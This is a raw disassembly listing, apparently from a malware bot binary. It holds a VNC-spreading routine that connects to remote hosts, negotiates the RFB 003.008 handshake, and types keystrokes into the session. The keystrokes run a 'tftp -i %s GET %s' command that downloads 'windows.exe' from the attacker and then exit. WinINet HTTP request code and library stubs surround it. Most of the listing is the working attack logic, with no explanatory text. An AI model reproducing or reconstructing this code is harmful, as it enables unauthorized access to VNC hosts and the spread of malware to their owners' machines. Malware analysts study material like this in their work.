loc_41DBDA: ; CODE XREF: sub_41DAA1+122�j
push ebx
push ebx
push 3
lea eax, [ebp+74h+var_C8]
push eax
lea eax, [ebp+74h+var_1C8]
push eax
push esi
lea eax, [ebp+74h+Dst]
push eax
push dword_444254
call dword_44413C ; InternetConnectA
mov esi, eax
cmp esi, ebx
jnz short loc_41DC0A
push offset unk_4394CC
jmp short loc_41DC54
; ---------------------------------------------------------------------------
loc_41DC0A: ; CODE XREF: sub_41DAA1+160�j
push ebx
push 200h
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_2D8]
push eax
push ebx
lea eax, [ebp+74h+var_65C]
push eax
push ebx
push esi
call dword_44412C ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+74h+var_4], eax
jnz short loc_41DC39
push offset unk_43949C
jmp short loc_41DC54
; ---------------------------------------------------------------------------
loc_41DC39: ; CODE XREF: sub_41DAA1+18F�j
push ebx
push ebx
push ebx
push ebx
push eax
call dword_444258 ; HttpSendRequestA
test eax, eax
jz short loc_41DC4F
push offset dword_439480
jmp short loc_41DC54
; ---------------------------------------------------------------------------
loc_41DC4F: ; CODE XREF: sub_41DAA1+1A5�j
push offset asc_439444 ; "-"
loc_41DC54: ; CODE XREF: sub_41DAA1+167�j
; sub_41DAA1+196�j ...
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _sprintf
loc_41DC60: ; CODE XREF: sub_41DAA1+CB�j
cmp [ebp+74h+var_1D4], ebx
pop ecx
pop ecx
jnz short loc_41DC8D
push ebx ; int
push [ebp+74h+var_1D0] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_258]
push eax ; Str
push [ebp+74h+var_35C] ; int
call sub_40123B
add esp, 14h
loc_41DC8D: ; CODE XREF: sub_41DAA1+1C7�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
pop ecx
push esi
call dword_444164 ; InternetCloseHandle
push [ebp+74h+var_4]
call dword_444164 ; InternetCloseHandle
push [ebp+74h+var_1D8]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_41DAA1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41DCBE(int,char *Str,int)
sub_41DCBE proc near ; CODE XREF: .text:0041DEEA�p
; .text:0041DF08�p ...
var_1C = byte ptr -1Ch
var_14 = byte ptr -14h
var_C = word ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov esi, offset dword_439520
lea edi, [ebp+var_14]
movsd
movsb
mov esi, offset dword_439518
lea edi, [ebp+var_1C]
movsd
xor ebx, ebx
cmp eax, ebx
mov [ebp+var_4], 4
mov [ebp+var_C], 1
mov [ebp+var_8], bx
movsw
jnz short loc_41DD74
mov edi, [ebp+Str]
mov esi, [ebp+arg_0]
mov [ebp+arg_8], ebx
loc_41DCFE: ; CODE XREF: sub_41DCBE+B2�j
mov eax, [ebp+arg_8]
sub eax, ebx
jz short loc_41DD1B
dec eax
jnz short loc_41DD69
push ebx
push 1
lea eax, [ebp+var_4]
push eax
push esi
call dword_4441A0 ; send
lea eax, [ebp+var_8]
jmp short loc_41DD2C
; ---------------------------------------------------------------------------
loc_41DD1B: ; CODE XREF: sub_41DCBE+45�j
push ebx
push 1
lea eax, [ebp+var_4]
push eax
push esi
call dword_4441A0 ; send
lea eax, [ebp+var_C]
loc_41DD2C: ; CODE XREF: sub_41DCBE+5B�j
push ebx
push 1
push eax
push esi
call dword_4441A0 ; send
push edi ; Str
call _strlen
cmp eax, 2
pop ecx
push ebx
jnz short loc_41DD4B
push 4
lea eax, [ebp+var_14]
jmp short loc_41DD50
; ---------------------------------------------------------------------------
loc_41DD4B: ; CODE XREF: sub_41DCBE+84�j
push 5
lea eax, [ebp+var_1C]
loc_41DD50: ; CODE XREF: sub_41DCBE+8B�j
push eax
push esi
call dword_4441A0 ; send
push ebx
push edi ; Str
call _strlen
pop ecx
push eax
push edi
push esi
call dword_4441A0 ; send
loc_41DD69: ; CODE XREF: sub_41DCBE+48�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_41DCFE
jmp short loc_41DDE7
; ---------------------------------------------------------------------------
loc_41DD74: ; CODE XREF: sub_41DCBE+35�j
dec eax
jz short loc_41DD90
dec eax
jnz short loc_41DDE7
mov esi, [ebp+arg_0]
push ebx
push 1
lea eax, [ebp+var_4]
push eax
push esi
call dword_4441A0 ; send
lea eax, [ebp+var_8]
jmp short loc_41DDA4
; ---------------------------------------------------------------------------
loc_41DD90: ; CODE XREF: sub_41DCBE+B7�j
mov esi, [ebp+arg_0]
push ebx
push 1
lea eax, [ebp+var_4]
push eax
push esi
call dword_4441A0 ; send
lea eax, [ebp+var_C]
loc_41DDA4: ; CODE XREF: sub_41DCBE+D0�j
push ebx
push 1
push eax
push esi
call dword_4441A0 ; send
push [ebp+Str] ; Str
call _strlen
cmp eax, 2
pop ecx
push ebx
jnz short loc_41DDC5
push 4
lea eax, [ebp+var_14]
jmp short loc_41DDCA
; ---------------------------------------------------------------------------
loc_41DDC5: ; CODE XREF: sub_41DCBE+FE�j
push 5
lea eax, [ebp+var_1C]
loc_41DDCA: ; CODE XREF: sub_41DCBE+105�j
push eax
push esi
call dword_4441A0 ; send
push ebx
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push esi
call dword_4441A0 ; send
loc_41DDE7: ; CODE XREF: sub_41DCBE+B4�j
; sub_41DCBE+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DCBE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8Ch
push ebx
push esi
push edi
mov esi, offset aRfb003_008 ; "RFB 003.008\n"
lea edi, [ebp-3Ch]
movsd
movsd
movsd
movsb
mov esi, offset dword_439548
lea edi, [ebp-24h]
movsw
movsb
mov esi, offset dword_439520
lea edi, [ebp-2Ch]
movsd
movsb
mov esi, offset dword_439544
lea edi, [ebp-18h]
movsw
movsb
mov esi, offset dword_439540
lea edi, [ebp-10h]
movsw
xor ebx, ebx
push ebx
push 1
movsb
push 2
mov word ptr [ebp-14h], 1
mov word ptr [ebp-20h], 1
mov word ptr [ebp-1Ch], 72h
xor edi, edi
call dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp-8], esi
jnz short loc_41DE61
push eax
call dword_444218 ; closesocket
loc_41DE61: ; CODE XREF: .text:0041DE58�j
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-4Ch], 2
call dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-48h], eax
call dword_444260 ; htons
mov [ebp-4Ah], ax
push 10h
lea eax, [ebp-4Ch]
push eax
push esi
call dword_4440AC ; connect
test eax, eax
jnz loc_41E113
jmp loc_41E18C
; ---------------------------------------------------------------------------
loc_41DE9E: ; CODE XREF: .text:0041E1B1�j
cmp eax, 0FFFFFFFFh
jz short loc_41DED5
mov eax, edi
sub eax, ebx
jz loc_41E153
dec eax
jz loc_41E121
dec eax
jnz loc_41E183
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-8Ch]
push eax
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_41E113
loc_41DED5: ; CODE XREF: .text:0041DEA1�j
; .text:0041E186�j ...
push ebx
push 1
lea eax, [ebp-20h]
push eax
push esi
call dword_4441A0 ; send
push 1
lea eax, [ebp-18h]
push eax
push esi
call sub_41DCBE
mov esi, ds:dword_42B014
add esp, 0Ch
mov edi, 3E8h
push edi
call esi ; Sleep
push ebx
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
push edi
call esi ; Sleep
push 2
lea eax, [ebp-18h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
push edi
call esi ; Sleep
push offset byte_4434D8
mov [ebp-4], ebx
call _strlen
test eax, eax
pop ecx
mov ebx, offset aC_2 ; "%c"
jbe short loc_41DF7D
loc_41DF3E: ; CODE XREF: .text:0041DF7B�j
mov eax, [ebp-4]
movsx eax, byte_4434D8[eax]
push eax
push ebx
lea eax, [ebp-0Ch]
push 3
push eax
call __snprintf
push 0
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push offset byte_4434D8
call _strlen
cmp [ebp-4], eax
pop ecx
jb short loc_41DF3E
loc_41DF7D: ; CODE XREF: .text:0041DF3C�j
push 0
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
push 7D0h
call esi ; Sleep
push 100h
push 0
push offset byte_4E27F0
call _memset
add esp, 0Ch
push offset aWindows_exe ; "windows.exe"
push dword ptr [ebp+8]
call sub_4023C9
pop ecx
push eax
push offset aTftpISGetS ; "tftp -i %s GET %s"
push 0FFh
push offset byte_4E27F0
call __snprintf
and dword ptr [ebp-4], 0
push offset byte_4E27F0
call _strlen
add esp, 18h
test eax, eax
jbe short loc_41E020
loc_41DFE1: ; CODE XREF: .text:0041E01E�j
mov eax, [ebp-4]
movsx eax, byte_4E27F0[eax]
push eax
push ebx
lea eax, [ebp-0Ch]
push 3
push eax
call __snprintf
push 0
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push offset byte_4E27F0
call _strlen
cmp [ebp-4], eax
pop ecx
jb short loc_41DFE1
loc_41E020: ; CODE XREF: .text:0041DFDF�j
push edi
call esi ; Sleep
push 0
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
push 7530h
call esi ; Sleep
and dword ptr [ebp-4], 0
push offset aWindows_exe ; "windows.exe"
call _strlen
test eax, eax
pop ecx
jbe short loc_41E08D
loc_41E04E: ; CODE XREF: .text:0041E08B�j
mov eax, [ebp-4]
movsx eax, byte ptr aWindows_exe[eax] ; "windows.exe"
push eax
push ebx
lea eax, [ebp-0Ch]
push 3
push eax
call __snprintf
push 0
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push offset aWindows_exe ; "windows.exe"
call _strlen
cmp [ebp-4], eax
pop ecx
jb short loc_41E04E
loc_41E08D: ; CODE XREF: .text:0041E04C�j
push edi
call esi ; Sleep
push 0
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
and dword ptr [ebp-4], 0
mov edi, offset aExit ; "exit"
push edi
call _strlen
add esp, 10h
test eax, eax
jbe short loc_41E0EF
loc_41E0B4: ; CODE XREF: .text:0041E0ED�j
mov eax, [ebp-4]
movsx eax, byte ptr aExit[eax] ; "exit"
push eax
push ebx
lea eax, [ebp-0Ch]
push 3
push eax
call __snprintf
push 0
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc dword ptr [ebp-4]
push edi
call _strlen
cmp [ebp-4], eax
pop ecx
jb short loc_41E0B4
loc_41E0EF: ; CODE XREF: .text:0041E0B2�j
push 2
pop edi
loc_41E0F2: ; CODE XREF: .text:0041E10B�j
push 258h
call esi ; Sleep
push 0
lea eax, [ebp-10h]
push eax
push dword ptr [ebp-8]
call sub_41DCBE
add esp, 0Ch
dec edi
jnz short loc_41E0F2
mov esi, [ebp-8]
xor ebx, ebx
inc ebx
loc_41E113: ; CODE XREF: .text:0041DE93�j
; .text:0041DECF�j ...
push esi
call dword_444218 ; closesocket
pop edi
pop esi
mov eax, ebx
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41E121: ; CODE XREF: .text:0041DEAE�j
lea eax, [ebp-24h]
push eax
lea eax, [ebp-8Ch]
push eax
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_41E113
lea eax, [ebp-14h]
push ebx
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp-14h]
push eax
push esi
call dword_4441A0 ; send
push 2
pop edi
jmp short loc_41E18C
; ---------------------------------------------------------------------------
loc_41E153: ; CODE XREF: .text:0041DEA7�j
lea eax, [ebp-3Ch]
push eax
lea eax, [ebp-8Ch]
push eax
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_41E113
lea eax, [ebp-3Ch]
push ebx
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp-3Ch]
push eax
push esi
call dword_4441A0 ; send
xor edi, edi
inc edi
loc_41E183: ; CODE XREF: .text:0041DEB5�j
cmp edi, 3
jz loc_41DED5
loc_41E18C: ; CODE XREF: .text:0041DE99�j
; .text:0041E151�j
push 40h
lea eax, [ebp-8Ch]
push ebx
push eax
call _memset
add esp, 0Ch
push ebx
push 40h
lea eax, [ebp-8Ch]
push eax
push esi
call dword_444064 ; recv
cmp eax, ebx
jg loc_41DE9E
jmp loc_41DED5
; ---------------------------------------------------------------------------
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [000000E9 BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION __vsnprintf. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _sprintf. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION __snprintf. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j__atol. PRESS KEYPAD "+" TO EXPAND]
; [000000AD BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000088 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION _fgets. PRESS KEYPAD "+" TO EXPAND]
; [000001AD BYTES: COLLAPSED FUNCTION _strtoxl. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _strtoul. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41EC78 proc near ; CODE XREF: sub_40274D+5685�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_42B02C ; DeleteFileA
test eax, eax
jnz short loc_41EC8E
call ds:dword_42B01C ; RtlGetLastWin32Error
jmp short loc_41EC90
; ---------------------------------------------------------------------------
loc_41EC8E: ; CODE XREF: sub_41EC78+C�j
xor eax, eax
loc_41EC90: ; CODE XREF: sub_41EC78+14�j
test eax, eax
jz short loc_41EC9F
push eax
call __dosmaperr
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41EC9F: ; CODE XREF: sub_41EC78+1A�j
xor eax, eax
retn
sub_41EC78 endp
; [00000032 BYTES: COLLAPSED FUNCTION _fprintf. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41ECD4 proc near ; CODE XREF: sub_40274D+2F87�p
; sub_40274D+3268�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4434F0, eax
retn
sub_41ECD4 endp
; [00000023 BYTES: COLLAPSED FUNCTION _rand. PRESS KEYPAD "+" TO EXPAND]
; [00000148 BYTES: COLLAPSED FUNCTION __splitpath. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION _strrchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000039 BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BE BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000086 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [00000030 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000135 BYTES: COLLAPSED FUNCTION _strncat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000034 BYTES: COLLAPSED FUNCTION _sscanf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B8 BYTES: COLLAPSED FUNCTION _memcmp. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION _wcscat. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION _wcscpy. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION _time. PRESS KEYPAD "+" TO EXPAND]
; [000000A6 BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000121 BYTES: COLLAPSED FUNCTION _floor. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __cfltcvt_init. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION __fpmath. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __ftol2. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j__free. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _JumpToContinuation(void *,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; [00000007 BYTES: COLLAPSED FUNCTION sub_41FEF0. PRESS KEYPAD "+" TO EXPAND]
; [00000052 BYTES: COLLAPSED FUNCTION unknown_libname_2. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION ___CxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION CatchGuardHandler(EHExceptionRecord *,CatchGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
; [000000C5 BYTES: COLLAPSED FUNCTION _CallSETranslator(EHExceptionRecord *,EHRegistrationNode *,void *,void *,_s_FuncInfo const *,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [000000B2 BYTES: COLLAPSED FUNCTION TranslatorGuardHandler(EHExceptionRecord *,TranslatorGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *). PRESS KEYPAD "+" TO EXPAND]
; [00000019 BYTES: COLLAPSED FUNCTION _CreateFrameInfo(FrameInfo *,void *). PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION IsExceptionObjectToBeDestroyed(void *). PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION _FindAndUnlinkFrame(FrameInfo *). PRESS KEYPAD "+" TO EXPAND]
; [00000059 BYTES: COLLAPSED FUNCTION _CallCatchBlock2(EHRegistrationNode *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __NLG_Notify1. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 4
; [0000001F BYTES: COLLAPSED FUNCTION __EH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [0000003A BYTES: COLLAPSED FUNCTION _CxxThrowException(x,x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000011D BYTES: COLLAPSED FUNCTION _ceil. PRESS KEYPAD "+" TO EXPAND]
; [00000107 BYTES: COLLAPSED FUNCTION _mbstowcs. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42065F proc near ; CODE XREF: sub_40FDC3+100�p
; sub_419429+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_42B050 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_42067F
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
call __dosmaperr
pop ecx
loc_42067B: ; CODE XREF: sub_42065F+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_42067F: ; CODE XREF: sub_42065F+D�j
test al, 1
jz short loc_4206A0
test [esp+arg_4], 2
jz short loc_4206A0
mov dword_4E28F4, 0Dh
mov dword_4E28F8, 5
jmp short loc_42067B
; ---------------------------------------------------------------------------
loc_4206A0: ; CODE XREF: sub_42065F+22�j
; sub_42065F+29�j
xor eax, eax
retn
sub_42065F endp
; [00000016 BYTES: COLLAPSED FUNCTION _wcslen. PRESS KEYPAD "+" TO EXPAND]
; [0000008E BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; [00000107 BYTES: COLLAPSED FUNCTION _fwrite. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000095 BYTES: COLLAPSED FUNCTION __aulldvrm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AA BYTES: COLLAPSED FUNCTION __alldiv. PRESS KEYPAD "+" TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION __strupr. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _isdigit. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _isspace. PRESS KEYPAD "+" TO EXPAND]
; [000000D5 BYTES: COLLAPSED FUNCTION _tolower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __aullrem. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [000000B3 BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
; [0000006D BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4210CC proc near ; CODE XREF: ___endstdio�p
push 1
call _flsall
pop ecx
retn
sub_4210CC endp
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
; [000001EE BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [00000168 BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
; [00000072 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000116 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _write_char. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION _write_multi_char. PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION _write_string. PRESS KEYPAD "+" TO EXPAND]
; [000007DA BYTES: COLLAPSED FUNCTION __output. PRESS KEYPAD "+" TO EXPAND]
off_422AA2 dd offset loc_4224E4 ; DATA XREF: __output+85�r
dd offset loc_422354 ; jump table for switch statement
dd offset loc_422371
dd offset loc_4223BD
dd offset loc_4223FE
dd offset loc_422407
dd offset loc_422445
dd offset loc_422526
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_422B83. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_422B6F proc near ; DATA XREF: .rdata:stru_4396D0�o
xor eax, eax
inc eax
retn
sub_422B6F endp
; =============== S U B R O U T I N E =======================================
sub_422B73 proc near ; DATA XREF: .rdata:stru_4396D0�o
mov esp, [ebp-18h]
sub_422B73 endp ; sp-analysis failed
; [0000000D BYTES: COLLAPSED CHUNK OF FUNCTION sub_422B83. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION sub_422B83. PRESS KEYPAD "+" TO EXPAND]
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [0000005F BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
